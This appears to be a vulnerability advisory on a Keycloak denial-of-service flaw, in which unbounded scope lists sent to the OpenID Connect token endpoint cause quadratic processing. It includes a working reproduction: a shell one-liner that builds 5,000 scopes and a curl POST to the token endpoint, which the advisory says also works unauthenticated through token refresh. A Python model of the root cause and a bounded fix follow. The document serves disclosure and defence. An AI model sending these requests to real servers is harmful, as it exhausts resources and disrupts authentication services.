When receiving a POST request on the OpenID Connect token endpoint, Keycloak fails to limit the passed-in scopes, which leads to high resource usage in Keycloak.

1. Generate a long list of scopes:

```
SCOPE_5K=$(python3 -c "print(' '.join(['scope'+str(i) for i in range(5000)]))")
echo "Scope parameter length: ${#SCOPE_5K} bytes"
```

2. Post a ROPC grant (`KC_URL` is the base URL of the Keycloak server):

```
time curl -s -o /dev/null -w "admin-cli 5K scopes: HTTP %{http_code} (%{time_total}s)\n" \
  -X POST "${KC_URL}/realms/master/protocol/openid-connect/token" \
  -d "grant_type=password&client_id=admin-cli&username=x&password=x&scope=${SCOPE_5K}"
```

Root cause: `TokenManager.getRequestedClientScopes()` at line 658 performs `String.contains()` on the entire scope parameter string for each default client scope, resulting in O(n²) processing time. A single POST request with ~49KB of scope values causes 38.6 seconds of server-side processing; with ~99KB it reaches 151.8 seconds.

The same problem occurs for client credential grants and token refreshes. In the case of token refreshes the problem occurs even before the token is checked, so any token can be used, allowing an unauthenticated attacker to trigger it.
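To make the root cause concrete, here is a constructed Python model of the scope-resolution pattern the report describes, placed next to a bounded variant that rejects oversized parameters before doing any work and matches whole tokens. This is illustration code added here, not Keycloak's implementation; the scope names and the two limits are assumptions.

```python
# Constructed model of the scope-resolution pattern described in the report.
# This is illustration code added here, not Keycloak's implementation; the
# scope names and the two limits are assumptions chosen for the example.
from typing import Iterable, Optional, Set

MAX_SCOPE_PARAM_LEN = 2048  # assumed cap on the raw scope parameter (characters)
MAX_SCOPE_COUNT = 32        # assumed cap on space-separated scope tokens

# Assumed default client scopes for the model.
DEFAULT_CLIENT_SCOPES = ["openid", "profile", "email", "roles", "web-origins"]


def resolve_scopes_substring(scope_param: str, client_scopes: Iterable[str]) -> Set[str]:
    """The reported pattern: for every client scope, scan the whole scope
    parameter with a substring test. Each `in` walks the full string and
    nothing bounds its length, so a large parameter costs a full scan per
    scope. Substring matching is also imprecise: "email-digest" matches "email".
    """
    return {name for name in client_scopes if name in scope_param}


def reject_reason(scope_param: str) -> Optional[str]:
    """Cheap linear-time checks to run before any scope processing. Returns
    None when the parameter is acceptable, otherwise a short reason."""
    if len(scope_param) > MAX_SCOPE_PARAM_LEN:
        return "scope parameter too long"
    if len(scope_param.split()) > MAX_SCOPE_COUNT:
        return "too many scopes requested"
    return None


def resolve_scopes_bounded(scope_param: str, client_scopes: Iterable[str]) -> Set[str]:
    """Hardened variant: enforce the limits first, tokenize once, then match
    whole tokens by set membership (one hash lookup per client scope)."""
    reason = reject_reason(scope_param)
    if reason is not None:
        raise ValueError(reason)
    requested = set(scope_param.split())
    return {name for name in client_scopes if name in requested}


if __name__ == "__main__":
    # Constructed input in the spirit of the report's SCOPE_5K (about 49KB).
    flood = " ".join(f"scope{i}" for i in range(5000))
    print(resolve_scopes_substring("openid profile", DEFAULT_CLIENT_SCOPES))
    print(resolve_scopes_bounded("openid profile", DEFAULT_CLIENT_SCOPES))
    print(reject_reason(flood))
```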